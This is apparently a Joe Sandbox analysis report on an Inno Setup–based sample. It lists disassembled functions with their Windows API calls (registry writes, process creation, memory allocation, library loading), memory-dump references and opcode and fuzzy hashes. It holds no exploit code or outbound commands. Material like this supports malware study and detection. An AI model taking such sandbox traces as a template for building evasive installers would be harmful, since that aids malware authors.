                                                                                                      Function 0046F0EC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34registryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,004763FA,?,0049C1D0,?,0046F403,?,00000000,0046F99E,?,_is1), ref: 0046F10F
                                                                                                      Strings
                                                                                                      • Inno Setup: Setup Version, xrefs: 0046F10D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value
                                                                                                      • String ID: Inno Setup: Setup Version
                                                                                                      • API String ID: 3702945584-4166306022
                                                                                                      • Opcode ID: 734ac0f1c1098741eb0e60cbf617dbc9041c5452899e61f021b18629f5aca0fc
                                                                                                      • Instruction ID: 253732d940e31991125f8b939195b5ca02eb4333684dc2ddbbcc15e62aa31341
                                                                                                      • Opcode Fuzzy Hash: 734ac0f1c1098741eb0e60cbf617dbc9041c5452899e61f021b18629f5aca0fc
                                                                                                      • Instruction Fuzzy Hash: 3BE06D713012047FD710AA6B9C85F5BBADDDF993A5F10403AB908DB392D578DD4081A8
                                                                                                      Function 0046F15C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24registryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F7DA,?,?,00000000,0046F99E,?,_is1,?), ref: 0046F16F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value
                                                                                                      • String ID: NoModify
                                                                                                      • API String ID: 3702945584-1699962838
                                                                                                      • Opcode ID: 14b653d2795b3180ab09acf432715bdcca8a399851f75d04a8bb0bb30e96b91c
                                                                                                      • Instruction ID: dfbc78ba79a393f528aadc4bccb3a1e1d52346a2df28baf9fde3d1272b39f611
                                                                                                      • Opcode Fuzzy Hash: 14b653d2795b3180ab09acf432715bdcca8a399851f75d04a8bb0bb30e96b91c
                                                                                                      • Instruction Fuzzy Hash: D8E04FB4604304BFEB04DB55DD4AF6B77ECDB48750F10415ABA04DB281E674EE00C668
                                                                                                      Function 0047DF80 Relevance: 3.2, APIs: 2, Instructions: 160windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetACP.KERNEL32(?,?,00000001,00000000,0047E25F,?,-0000001A,004800D8,-00000010,?,00000004,0000001B,00000000,00480425,?,0045DECC), ref: 0047DFF6
                                                                                                        • Part of subcall function 0042E32C: 73A0A570.USER32(00000000,00000000,0048048C,?,?,00000001,00000000,00000002,00000000,00480D8E,?,?,?,?,?,004986AB), ref: 0042E33B
                                                                                                        • Part of subcall function 0042E32C: EnumFontsA.GDI32(?,00000000,0042E318,00000000,00000000,0042E384,?,00000000,00000000,0048048C,?,?,00000001,00000000,00000002,00000000), ref: 0042E366
                                                                                                        • Part of subcall function 0042E32C: 73A0A480.USER32(00000000,?,0042E38B,00000000,00000000,0042E384,?,00000000,00000000,0048048C,?,?,00000001,00000000,00000002,00000000), ref: 0042E37E
                                                                                                      • SendNotifyMessageA.USER32(00020420,00000496,00002711,-00000001), ref: 0047E1C6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: A480A570EnumFontsMessageNotifySend
                                                                                                      • String ID:
                                                                                                      • API String ID: 2685184028-0
                                                                                                      • Opcode ID: d5a98fd350b21412a22cf4123539bd0c298e95acb479fbe192b8033f652af546
                                                                                                      • Instruction ID: 0ea8e5e95b90053dcc80dc26f94e29a170662e2b3e10ca2db4d961c35622b213
                                                                                                      • Opcode Fuzzy Hash: d5a98fd350b21412a22cf4123539bd0c298e95acb479fbe192b8033f652af546
                                                                                                      • Instruction Fuzzy Hash: 2651A6746001508BD710FF27D9C16963799EB88308B90C6BBA8089F367C77CDD068B9D
                                                                                                      Function 0042DC10 Relevance: 3.1, APIs: 2, Instructions: 113registryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD48), ref: 0042DC4C
                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD48), ref: 0042DCBC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: QueryValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 3660427363-0
                                                                                                      • Opcode ID: dcaea444aa2693f3151e4f161b8541bd325653ac2cf38fab622dd52302d9ecee
                                                                                                      • Instruction ID: 0afc69acb925fd444515a6cbe8b6240f093bd173affdd4b5aabebdcedbe93bcc
                                                                                                      • Opcode Fuzzy Hash: dcaea444aa2693f3151e4f161b8541bd325653ac2cf38fab622dd52302d9ecee
                                                                                                      • Instruction Fuzzy Hash: E0414F71E00529ABDB11DF95D881BAFB7B8AB00714F90846AE800F7241D778AE00CBA9
                                                                                                      Function 0042DED0 Relevance: 3.1, APIs: 2, Instructions: 111registryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFE6,?,?,00000008,00000000,00000000,0042E013), ref: 0042DF7C
                                                                                                      • RegCloseKey.ADVAPI32(?,0042DFED,?,00000000,00000000,00000000,00000000,00000000,0042DFE6,?,?,00000008,00000000,00000000,0042E013), ref: 0042DFE0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseEnum
                                                                                                      • String ID:
                                                                                                      • API String ID: 2818636725-0
                                                                                                      • Opcode ID: 18687f4e18b3232f9437fac6e5314fb2332009eed5616211d6a140e10b5cd508
                                                                                                      • Instruction ID: 2fe76ac110d60e281b9c8dcd8425dafac1d5c60e45ccd2ae84570cbaedcb928d
                                                                                                      • Opcode Fuzzy Hash: 18687f4e18b3232f9437fac6e5314fb2332009eed5616211d6a140e10b5cd508
                                                                                                      • Instruction Fuzzy Hash: 52319170F04258AEDB11DFA2DD82BAEB7B9EB48304F91407BE501E7281D6785A01CA2D
                                                                                                      Function 004527D4 Relevance: 3.1, APIs: 2, Instructions: 60processCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CreateProcessA.KERNEL32(00000000,00000000,?,?,004580B4,00000000,0045809C,?,?,?,00000000,0045284E,?,?,?,00000001), ref: 00452828
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,?,?,004580B4,00000000,0045809C,?,?,?,00000000,0045284E,?,?,?,00000001), ref: 00452830
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateErrorLastProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 2919029540-0
                                                                                                      • Opcode ID: 256024ef10b7bad05e9cca563efcf05eafb457725b2bcd1ab333216967b323f1
                                                                                                      • Instruction ID: 3ad6dec6d32dc5e6ab031f6e5884ad9a987dc2d9ff381773f4694f698bcb58b9
                                                                                                      • Opcode Fuzzy Hash: 256024ef10b7bad05e9cca563efcf05eafb457725b2bcd1ab333216967b323f1
                                                                                                      • Instruction Fuzzy Hash: D3117972600208AF8B00DEADDD41DABB7ECEB4E310B10456BFD08E3201D678AE148BA4
                                                                                                      Function 0040AFD8 Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AFF2
                                                                                                      • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B14F,00000000,0040B167,?,?,?,00000000), ref: 0040B003
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Resource$FindFree
                                                                                                      • String ID:
                                                                                                      • API String ID: 4097029671-0
                                                                                                      • Opcode ID: 020963cbed5d1efe29b5c6b0b84e3d8c20ff6c1b4cf1f3711bef16ed23147c41
                                                                                                      • Instruction ID: 22447e907da962d806d3eb032de74b702d5affa043e15eb070a4a3d902aeafed
                                                                                                      • Opcode Fuzzy Hash: 020963cbed5d1efe29b5c6b0b84e3d8c20ff6c1b4cf1f3711bef16ed23147c41
                                                                                                      • Instruction Fuzzy Hash: 0001DF71300604AFD710FF69DC92E1B77A9DB8A718711807AF500AB7D0DA79AC0096AD
                                                                                                      Function 0041EEB4 Relevance: 3.0, APIs: 2, Instructions: 49threadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                                                      • 73A15940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042EEC0,?,00000001), ref: 0041EF09
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: A15940CurrentThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 1959240892-0
                                                                                                      • Opcode ID: 4f622a916fb84fb1e9f1f3e222a7611e51385d213cb7cd19795c9b5a33aefee2
                                                                                                      • Instruction ID: 3b2ca51acea6f31c20bceb620234c512699c69eae89bb1383ecfa3b3ac64bed2
                                                                                                      • Opcode Fuzzy Hash: 4f622a916fb84fb1e9f1f3e222a7611e51385d213cb7cd19795c9b5a33aefee2
                                                                                                      • Instruction Fuzzy Hash: FD013976A04604BFDB06CF6BDC1195ABBE9E789720B22887BEC04D36A0E6355810DE18
                                                                                                      Function 00452C6C Relevance: 3.0, APIs: 2, Instructions: 48fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • MoveFileA.KERNEL32(00000000,00000000), ref: 00452CAE
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000,00452CD4), ref: 00452CB6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastMove
                                                                                                      • String ID:
                                                                                                      • API String ID: 55378915-0
                                                                                                      • Opcode ID: 4a87794495b209091e638427933314290125c3fb15c22ae1653921e41cb98622
                                                                                                      • Instruction ID: 8cb4f6990e07c72a34a39c3d349ee9eec810a974928c7dd1f8c60ebce1e721cc
                                                                                                      • Opcode Fuzzy Hash: 4a87794495b209091e638427933314290125c3fb15c22ae1653921e41cb98622
                                                                                                      • Instruction Fuzzy Hash: D5014971B00204BB8B11DF799D414AEB7ECEB4A32531045BBFC08E3243EAB84E048558
                                                                                                      Function 0045275C Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004527BB), ref: 00452795
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000,004527BB), ref: 0045279D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 1375471231-0
                                                                                                      • Opcode ID: 638905229d0ae290751701005a3127306b10a627987a4e9871fe20b3b513e6c4
                                                                                                      • Instruction ID: 7517b5081c7c6af98826394809c6fe2d976c468da5ddf52a6f68070703836f12
                                                                                                      • Opcode Fuzzy Hash: 638905229d0ae290751701005a3127306b10a627987a4e9871fe20b3b513e6c4
                                                                                                      • Instruction Fuzzy Hash: 40F0FC71A04704AFCF00DF759D4199EB7E8DB0E715B5049B7FC14E3242E7B94E1485A8
                                                                                                      Function 0042324C Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 00423259
                                                                                                      • LoadCursorA.USER32(00000000,00000000), ref: 00423283
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CursorLoad
                                                                                                      • String ID:
                                                                                                      • API String ID: 3238433803-0
                                                                                                      • Opcode ID: 57390d314a1cb7161e6ddc30cf2ec12f57c29d9a020bc84e90da4252d8f033e1
                                                                                                      • Instruction ID: c8375b04fab070422f53c3d6524130e38f027298e82d6ab835706982cf041ecc
                                                                                                      • Opcode Fuzzy Hash: 57390d314a1cb7161e6ddc30cf2ec12f57c29d9a020bc84e90da4252d8f033e1
                                                                                                      • Instruction Fuzzy Hash: 0FF0A711704114AADA105D7E6CC0E2B7268DB91B36B6103BBFA3AD72D1C62E1D41457D
                                                                                                      Function 0042E3A4 Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
                                                                                                      • LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLibraryLoadMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 2987862817-0
                                                                                                      • Opcode ID: 7795cc8daa252176d65de3d8f3118caac988bfa791d53a68a28aad838e50b78c
                                                                                                      • Instruction ID: 98bcbcc3e9aaf4c66058534b39987ccdd7eb12bd14468eaf88ad72af9e5505e3
                                                                                                      • Opcode Fuzzy Hash: 7795cc8daa252176d65de3d8f3118caac988bfa791d53a68a28aad838e50b78c
                                                                                                      • Instruction Fuzzy Hash: D5F05E70A14744BEDF119F779C6282ABAACE749B1179248B6F810A3691E67D48108928
                                                                                                      Function 004162DA Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetClassInfoA.USER32(00400000,?,?), ref: 004162F1
                                                                                                      • GetClassInfoA.USER32(00000000,?,?), ref: 00416301
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClassInfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3534257612-0
                                                                                                      • Opcode ID: 0cefddb0d68ec1ee3d6e09aa9ac37d408dcb608ad702880eba3eeb66fdb88c2a
                                                                                                      • Instruction ID: dc9e2acc6f173dd0cc3aa24d84b637cb0067f0ccc6b7cec6a0fcec59befe77f5
                                                                                                      • Opcode Fuzzy Hash: 0cefddb0d68ec1ee3d6e09aa9ac37d408dcb608ad702880eba3eeb66fdb88c2a
                                                                                                      • Instruction Fuzzy Hash: 22E012B26015155ADB10DB999D81EE326DCDB09310B110167BE14CA246D764DD005BA4
                                                                                                      Function 004508E4 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,004703F1,?,00000000), ref: 004508FA
                                                                                                      • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,004703F1,?,00000000), ref: 00450902
                                                                                                        • Part of subcall function 004506A0: GetLastError.KERNEL32(004504BC,00450762,?,00000000,?,004977FC,00000001,00000000,00000002,00000000,0049795D,?,?,00000005,00000000,00497991), ref: 004506A3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$FilePointer
                                                                                                      • String ID:
                                                                                                      • API String ID: 1156039329-0
                                                                                                      • Opcode ID: 740b0e3b535324eeb3a184350110131e2b1ae31ce216053ff26069d2cbf9fe72
                                                                                                      • Instruction ID: a22a311b57bf1dff13f45894218d9c0eaf9de3d8271a2984ee0ce7717fd7efee
                                                                                                      • Opcode Fuzzy Hash: 740b0e3b535324eeb3a184350110131e2b1ae31ce216053ff26069d2cbf9fe72
                                                                                                      • Instruction Fuzzy Hash: E0E012B53042059BFB00FA6599C1F3B63DCDB44315F00447AB984CF187D674CC155B29
                                                                                                      Function 004014E4 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Virtual$AllocFree
                                                                                                      • String ID:
                                                                                                      • API String ID: 2087232378-0
                                                                                                      • Opcode ID: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                                                      • Instruction ID: 119661fe7174a079321c86e78af40791ac039b5eb8373b45468023a5ba433726
                                                                                                      • Opcode Fuzzy Hash: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                                                      • Instruction Fuzzy Hash: F7F08272A0063067EB60596A4C81B5359859BC5B94F154076FD09FF3E9D6B58C0142A9
                                                                                                      Function 004085E4 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetSystemDefaultLCID.KERNEL32(00000000,0040871A), ref: 00408603
                                                                                                        • Part of subcall function 00406DF4: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E11
